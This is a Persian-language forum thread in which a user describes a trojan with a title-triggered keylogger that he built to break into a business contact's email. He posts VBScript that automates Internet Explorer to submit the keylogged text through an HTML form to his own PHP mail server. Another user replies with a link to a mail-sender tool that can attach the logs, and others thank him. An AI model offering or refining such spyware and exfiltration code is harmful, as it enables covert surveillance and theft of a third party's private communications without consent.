ايران ويج

نسخه‌ی کامل: کمک برای هک
شما در حال مشاهده‌ی نسخه‌ی متنی این صفحه می‌باشید. مشاهده‌ی نسخه‌ی کامل با قالب بندی مناسب.
سلام

شرکت پدرم با یه نفری قراردادی بسته، حالا به طرف شک کردن، پدرم از من خواسته که ایمیل یارو رو هک کنم.
من یه تروجان نوشتم، که به Title صفحات حساسه و اگه توی Title یه سری کلمه خاص باشه، Keylogger به کار می افته(چیزی که نمونش ریخته!!!)
راستش چون هیچ اطلاعاتی در مورد یارو ندارم مجبور شدم از این روش استفاده کنم که همه جوره جواب بده.
مشکلم سر فرستادن متن های کی لاگ شده به ایمیلمه!!!
قبلاً یه روشی توی سایت ارایه شده بود که کارش اینجوری بود:
یه صفحه HTML می ساخت، اون رو با Method=Post به یه میل سرور PHP می فرستاد اون هم برای من میل می کرد.
من هم این کار رو کردم(چون خودم یه میل سرور دارم خوب جواب می ده!!!)
مشکلی که پیش اومده اینه که 7 Internet Explorer، که همه ازش استفاده می کنن، اجازه اجرای این دستور رو نمی ده:
qq.All.Item("send").Click

این هم کل دستورات:
کد:
Set rpcc = CreateObject("InternetExplorer.application")
    rpcc.Navigate "C:\sendhmtl.htm"
Set qq = rpcc.Document
qq.All.Item("send").Click
qq = Null
    While rpcc.Busy = True
    DoEvents
    Wend
    rpcc.Quit

من خودم آدمی نیستم که برای آزار و اذیت، کسی رو هک کنم یا بخوام به کسی قدرت نمایی کنم. اینبار هم با توجه به حساسیت مسأله قبول کردم که این کار رو انجام بدم(که البته مثل خر توش موندم)
از دوستان خواهش می کنم من رو راهنمایی کنن، حتماً نباید جواب ها به راهی که من می خواستم انجام بدم ربطی داشته باشه
منتظر کمکتون هستم
سلام.
این برنامه میل سندر رو دانلود کن. قابلیت اتچ هم داره. mbza11 گذاشته بود تو سایت.
http://www.forum.iranled.com/attachment.php?aid=713
اگر نتونستی فایل اتچ کنی متن لاگ رو بخون. به صورت پیغام بفرست.
بابا دمت گرم عجب برنامه ایه!!!!
mbza11 جان، دست شما هم درد نکنه
سلام.
قابلي نداشت.
Exclamation يادت نره که براي استفاده از اين کد بايد ت وگوگل حساب ايميل داشته باشي.
ساخت جی میل دیگه بدون دعوت نامه هم امکان پذیره. هنوز خیلیا نمیدونن. چند وقت پیش یکی از دوستام گفت منو جیمیل اینوایت کن دیگه. نمیدونست آزاد شده.
سلام.
کاملا درسته. اما اگه اشتباه نکنم حجمي که با دعوت نامه ميده بيشتر هست. چندباري که من تست کردم اينجوري بود.
این تاپیک از بخش خصوصی به این بخش منتقل شد